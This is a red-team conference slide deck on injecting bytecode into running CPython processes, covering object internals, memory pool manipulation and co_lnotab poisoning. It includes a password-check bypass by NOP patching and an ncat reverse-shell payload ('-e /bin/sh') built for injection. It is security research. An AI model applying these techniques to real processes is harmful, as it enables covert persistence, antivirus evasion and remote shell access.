Evolving the Process Injection Injecting the Python bytecode - - PowerPoint PPT Presentation

evolving the process injection
SMART_READER_LITE
LIVE PREVIEW

Evolving the Process Injection Injecting the Python bytecode - - PowerPoint PPT Presentation

Evolving the Process Injection Injecting the Python bytecode WhoAmI Red teamer at Sberbank of Russia OSCP/OSCE/SLAE Process Injection purposes Accessing/modifying in-memory data or program execution flow AV evasion &


slide-1
SLIDE 1

Evolving the Process Injection

Injecting the Python bytecode

slide-2
SLIDE 2

WhoAmI

  • Red teamer at Sberbank of Russia
  • OSCP/OSCE/SLAE
slide-3
SLIDE 3

Process Injection purposes

  • Accessing/modifying in-memory data or program execution flow
  • AV evasion & anti-forensics
  • Post-exploitation & maintaining access
slide-4
SLIDE 4

Traditional Process Injection

  • Linux

○ strace ○ ptrace ○ SO Injection

  • Windows

○ DLL Injection ○ Process Hollowing

slide-5
SLIDE 5

Software is Evolving

  • Interpreted (and VM-based) languages keep growing their popularity, even in

non-traditional areas

  • New paradigms - microservices, serverless technologies
slide-6
SLIDE 6

Evolving & Attacker Benefits

  • Injecting VM-based (or other interpreted) languages potentially gives us all

benefits of these languages in our payloads — portability, ability to use “high-level” interfaces over “low-level” functions and other

  • Also, it is very hard to investigate — how many people can detect and

successfully reverse engineer Java or Python bytecode payloads?

slide-7
SLIDE 7

Primary Goal

  • Find a way to manipulate running Python process to gain required impact on

target system (usermode persistence, internal logic modification and other)

  • This way should work at least for x86_64 CPU, Linux and CPython 3.5.3
slide-8
SLIDE 8

Python

  • Interpreted, high-level programming language
  • Object-oriented, mostly
  • Strong community, great standard library, and perfect extensibility

Note: Python itself is just a reference, you can build your own Python engine and decide how it will work with Python code — compile it to special bytecode, interpret it as is, or even translate to Java bytecode and execute it with JVM

slide-9
SLIDE 9

CPython

  • The reference implementation of Python
  • Written in C (and Python)
  • Compiles source code to bytecode and interprets it with Python Virtual

Machine (PVM)

slide-10
SLIDE 10

CPython — Compilation

1. Parse source code into a parse tree 2. Transform parse tree into an Abstract Syntax Tree 3. Transform AST into a Control Flow Graph 4. Emit bytecode based on the Control Flow Graph

slide-11
SLIDE 11

CPython — Compilation Example

>>> def hello(): ... print("Hello!") >>> hello <function hello at 0x10bd210d0> >>> hello() Hello! >>> hello.__code__.co_code.hex() '740064018301010064005300' >>> dis.dis(hello.__code__) 2 0 LOAD_GLOBAL 0 (print) 2 LOAD_CONST 1 ('Hello!') 4 CALL_FUNCTION 1 6 POP_TOP 8 LOAD_CONST 0 (None) 10 RETURN_VALUE

Compilation produces a set of Objects (e.g., CodeObject for handling bytecode) and prepares them for Interpretation in the PVM

slide-12
SLIDE 12

CPython — Python Virtual Machine (PVM)

  • Virtual Stack Machine

○ Value Stack, Call Stack, and Block Stack ○ No registers ⇨ Short instructions list

  • Custom memory management

○ Huge space mapped as MAP_ANONYMOUS | MAP_PRIVATE ○ Arenas, Pools, and Blocks — internal memory management primitives ⇨ Small amount of system malloc/free calls

  • Operates Objects, not raw memory values

⇨ Keeps abstraction level high

slide-13
SLIDE 13

CPython — A Short Guide to Objects

  • Compilation and Interpretation produce a wide set of memory primitives

named Objects

  • C is not Object-Oriented, therefore all Objects are described with

corresponding structs

  • PVM works with these structs, therefore, we have to discover some of them to

move forward

slide-14
SLIDE 14

CPython — PyObject & PyVarObject

  • Universal headers, the Basis for all other Objects
  • Every pointer to a CPython Object can be cast to a PyObject* — inheritance

built by hand

  • PyVarObject is just a PyObject extension to describe Objects with

variable-sized part

slide-15
SLIDE 15

PyObject — Structure

typedef struct _object { _PyObject_HEAD_EXTRA Py_ssize_t ob_refcnt; struct _typeobject *ob_type; } PyObject;

slide-16
SLIDE 16

PyVarObject — Structure

typedef struct { PyObject ob_base; Py_ssize_t ob_size; } PyVarObject;

slide-17
SLIDE 17

CPython — Types

  • Every Object in CPython has its own Type specified by PyObject.ob_type field
  • Types are Objects too — instances of PyTypeObject struct
  • Type Objects are a fundamental part of CPython describing Objects

functionality and behavior

  • Some Examples:

○ PyUnicodeObject.ob_type → PyUnicode_Type ○ PyBytesObject.ob_type → PyBytes_Type ○ PyCodeObject.ob_type → PyCode_Type

slide-18
SLIDE 18

CPython — The Type for Types

  • Every Type Object is a PyObject, therefore it has the ob_type field:

○ PyUnicode_Type.ob_type → PyType_Type ○ PyBytes_Type.ob_type → PyType_Type ○ PyCode_Type.ob_type → PyType_Type

  • But PyType_Type is a PyObject too:

○ PyType_Type.ob_type → PyType_Type

slide-19
SLIDE 19

PyTypeObject — Structure

typedef struct _typeobject { PyObject_VAR_HEAD const char *tp_name; Py_ssize_t tp_basicsize, tp_itemsize; ... } PyTypeObject;

slide-20
SLIDE 20

A Short Guide to Objects — Subtotals

  • We already know the structure of PyObject and PyTypeObject instances —

comparatively, low-level structures.

  • There is still no place to inject CPython bytecode.
  • Let’s check the Object that works with CPython bytecode itself —

PyCodeObject.

slide-21
SLIDE 21

CPython — PyCodeObject

  • PyCodeObject — PyObject extension to describe pieces of Static Code.
  • PyCodeObject.ob_type → PyCode_Type
  • PyCodeObject is NOT a run-time primitive, it stores only static information

about bytecode:

○ PyUnicodeObject* co_name — specifies code name (e.g., function name, <stdin>) ○ PyBytesObject* co_code — opcode sequence ○ PyTupleObject* co_consts — constants used

slide-22
SLIDE 22

PyCodeObject — Example

>>> def hello(): ... print("Hello!") ... >>> hello.__code__.co_name 'hello' >>> hello.__code__.co_code b't\x00d\x01\x83\x01\x01\x00d\x00S\x00' >>> hello.__code__.co_consts (None, 'Hello!')

slide-23
SLIDE 23

PyCodeObject — Structure

typedef struct { PyObject_HEAD ... PyObject *co_code; PyObject *co_filename; PyObject *co_name; ... } PyCodeObject;

slide-24
SLIDE 24

PyCodeObject — Points of Interest

  • Controlling PyCodeObject allows us to play with member fields and pointers

like co_code and co_consts

  • Changing the co_code (ob_type → PyBytes_Type) field gives us an ability to

change existing or inject new bytecode

  • Playing with the co_consts (ob_type → PyTuple_Type) field allows us to add

some data to our injection

slide-25
SLIDE 25

CPython — PyBytesObject

  • PyBytesObject — PyVarObject extension to describe byte sequences
  • PyBytesObject.ob_type → PyBytes_Type
  • Just a container for bytes sequence
slide-26
SLIDE 26

PyBytesObject — Structure

typedef struct { PyObject_VAR_HEAD Py_hash_t ob_shash; char ob_sval[1]; } PyBytesObject;

slide-27
SLIDE 27

CPython — PyTupleObject

  • PyTupleObject — PyVarObject extension to describe immutable arrays of
  • bject references
  • PyTupleObject.ob_type → PyTuple_Type
  • Just a container for object references
slide-28
SLIDE 28

PyTupleObject — Structure

typedef struct { PyObject_VAR_HEAD PyObject *ob_item[1]; } PyTupleObject;

slide-29
SLIDE 29

A Short Guide to Objects — Conclusion

  • Gaining control on PyCodeObject and corresponding low-level structures

allows us to patch bytecode, inject values and do other things in the Virtual Memory

  • The main question there — How can we find necessary PyCodeObject?
slide-30
SLIDE 30

Finding PyCodeObject

The main approach: unraveling pointers chains

  • with known code name — targeted impact

○ Code name ⇨ PyUnicodeObject ⇨ PyCodeObject.co_name ○

  • with Symbol Table lookup — requires access to Python binary

○ PyCode_Type (from Symbol Table) ⇨ PyCodeObject.ob_type ○

  • with PyType_Type — potentially gives us access to all Objects

○ “type\x00” ⇨ PyType_Type ⇨ PyCode_Type ⇨ PyCodeObject.ob_type

slide-31
SLIDE 31

PyCodeObject.co_code Patching

  • When PyCodeObject is located, we can continue our work
  • Let’s try to patch existing bytecode and see how can we use that
slide-32
SLIDE 32

PyCodeObject.co_code Patching — Example

def check_password(password): if password == "P@ssw0rd": return True else: return False

  • An old-school example — patching the “if-then-else” construction

# bytecode: 7c00006401006b0200721000640200536403005364000053

slide-33
SLIDE 33

PyCodeObject.co_code Patching — Example

  • Will use NOP instruction with 0x09 opcode

# bytecode[9:12] = b”\x09\x09\x09”

slide-34
SLIDE 34

PyCodeObject.co_code Patching — The Problem

  • There is a chance to crash the application while patching bytecode being

executed

  • PyCodeObject is not a run-time primitive, there is no flag to show us the

Object is executing or not

  • But this flag exists in PyFrameObject
slide-35
SLIDE 35

CPython — PyFrameObject

  • PyFrameObject — PyVarObject extension to describe the Call Stack Frame
  • PyFrameObject.ob_type → PyFrame_Type
  • PyFrameObject — dynamic object created during Interpretation, it stores

arguments during function call and do other things like traditional Stack Frame

slide-36
SLIDE 36

PyFrameObject — Structure

typedef struct _frame { PyObject_VAR_HEAD struct _frame *f_back; /* previous frame, or NULL */ PyCodeObject *f_code; /* code segment */ ... PyObject *f_locals; /* local symbol table (any mapping) */ ... PyObject *f_localsplus[1]; /* locals+stack, dynamically sized */ } PyFrameObject;

slide-37
SLIDE 37

The Problem — Solution

  • Enum all PyFrameObjects with f_code field pointing to PyCodeObject we are

going to patch and check PyFrameObject.f_executing flag

  • If no PyFrameObjects are executing, patch the bytecode
slide-38
SLIDE 38

Demo #1

slide-39
SLIDE 39

From Patching to Injection

  • The simplest way to expand patching to injecting will not work — If we try to

append some opcodes to existing bytecode, we will crash the application

  • Moreover, we still don’t know how to add some data to our payload
  • The key to Injection is the ability to construct necessary objects and embed

them to CPython memory structure and program flow

slide-40
SLIDE 40

CPython — Memory Blocks

  • The “bytes” object is Immutable
slide-41
SLIDE 41

CPython — Memory Model

  • Custom memory manager build on the top of system allocator — PyMalloc
  • PyMalloc operates a set of primitives — Blocks, Pools, and Arenas
  • Reference Counting (PyObject.ob_refcnt) Garbage Collector
slide-42
SLIDE 42

Controlling the Pool

  • The Pool concept is the most interesting for us.
  • Each Pool has the Pool Header that stores some juicy info — like free blocks

list, freed by Garbage Collector

  • Pool Header address is a multiple of 4096, therefore it is easy to obtain Pool

Header address with a known address of the Object (and corresponding Block) that lies inside of this Pool

slide-43
SLIDE 43

pool_header — Structure

struct pool_header { union { block *_padding; uint count; } ref; /* number of allocated blocks */ block *freeblock; /* pool's free list head */ struct pool_header *nextpool; /* next pool of this size class */ struct pool_header *prevpool; /* previous pool "" */ ... uint nextoffset; /* bytes to virgin block */ uint maxnextoffset; /* largest valid nextoffset */ };

slide-44
SLIDE 44

pool_header — Structure

slide-45
SLIDE 45

Injection — Memory Allocation Strategy

  • We know PyCodeObject address — can obtain the address of the current

Pool Header

  • If there are some blocks in the free blocks list, shorten the list and get some

blocks for injected data (better to take Blocks from the middle of the list)

  • If no, check previous or next Pool Header
slide-46
SLIDE 46

Injection — Payload

  • Now we can create our own Objects and embed them to the CPython

Memory layout

  • Let’s develop a simple nc-based reverse shell payload and inject it into

existing code

slide-47
SLIDE 47

Payload — Balancing Code and Data

def shell_1(): import os

  • s.system( 'ncat 127.0.0.1 8081 -e /bin/sh

&') def shell_2(): eval("__import__('os').system('ncat 127.0.0.1 8081 -e /bin/sh &')" ) 0 LOAD_CONST 1 (0) 2 LOAD_CONST 0 (None) 4 IMPORT_NAME 0 (os) 6 STORE_FAST 0 (os) 8 LOAD_FAST 0 (os) 10 LOAD_METHOD 1 (system) 12 LOAD_CONST 2 ('ncat 127.0.0.1 8081 ...') 14 CALL_METHOD 1 16 POP_TOP 18 LOAD_CONST 0 (None) 20 RETURN_VALUE 0 LOAD_GLOBAL 0 (eval) 2 LOAD_CONST 1 ("__import__('os') ...") 4 CALL_FUNCTION 1 6 POP_TOP 8 LOAD_CONST 0 (None) 10 RETURN_VALUE

slide-48
SLIDE 48

Payload — Explanation

0 LOAD_GLOBAL 0 (eval) Pushes the 0th element from the co_names to the Stack >>> shell_2.__code__.co_names ('eval',) 2 LOAD_CONST 1 ("__import__('os') ...") Pushes the 1st element from the co_consts to the Stack >>> shell_2.__code__.co_consts (None, "__import__('os').system('ncat 127.0.0.1 8081 -e /bin/sh &')") 4 CALL_FUNCTION 1 6 POP_TOP Calls the Eval function and pops the result (really, who cares about the result?) 8 LOAD_CONST 0 (None) 10 RETURN_VALUE Loads the 0th element from the co_consts (None) and returns it as a result of our function — the most unnecessary part for our payload

slide-49
SLIDE 49

Injection — Battle Plan

  • Create the raw values for the following Objects

○ PyUnicodeObjects — for “eval” and “__import__('os').system('...')” strings ○ PyTupleObjects — for new PyCodeObject.co_names & co_consts tuples ○ PyBytesObject — for patched PyCodeObject.co_code bytecode containing injection itself

  • Find suitable free blocks and inject these raw values into these blocks
  • Provide the PyCodeObject with new addresses of co_names, co_consts and

co_code

  • Plan is good, but it will crash the application without one simple detail
slide-50
SLIDE 50

PyCodeObject.co_lnotab

  • Stores the mapping from bytecode offsets to line numbers
  • A set of pairs in hexadecimal format — (bytecode offset, according source

code lines count)

def hello(): print("hello!") print("world!") return True >>> dis.dis(hello) 2 0 LOAD_GLOBAL 0 (print) 2 LOAD_CONST 1 ('hello!') 4 CALL_FUNCTION 1 6 POP_TOP 3 8 LOAD_GLOBAL 0 (print) 10 LOAD_CONST 2 ('world!') 12 CALL_FUNCTION 1 14 POP_TOP 4 16 LOAD_CONST 3 (True) 18 RETURN_VALUE >>> hello.__code__.co_lnotab b'\x00\x01\x08\x01\x08\x01'

slide-51
SLIDE 51

PyCodeObject.co_lnotab Poisoning

  • Poisoning co_lnotab with value “\x00\x01” allows us to inject any payload
  • We just need to create a PyBytesObject with this value and change the

PyCodeObject.co_lnotab pointer

  • After that, we are ready to inject our payload
slide-52
SLIDE 52

Demo #2

slide-53
SLIDE 53

Conclusion

  • Controlling PyCodeObject is the first step of the bytecode Patching or

Injection

  • Common memory patching techniques (e.g., “if-then-else” statements

patching) works well for CPython

slide-54
SLIDE 54

Thanks!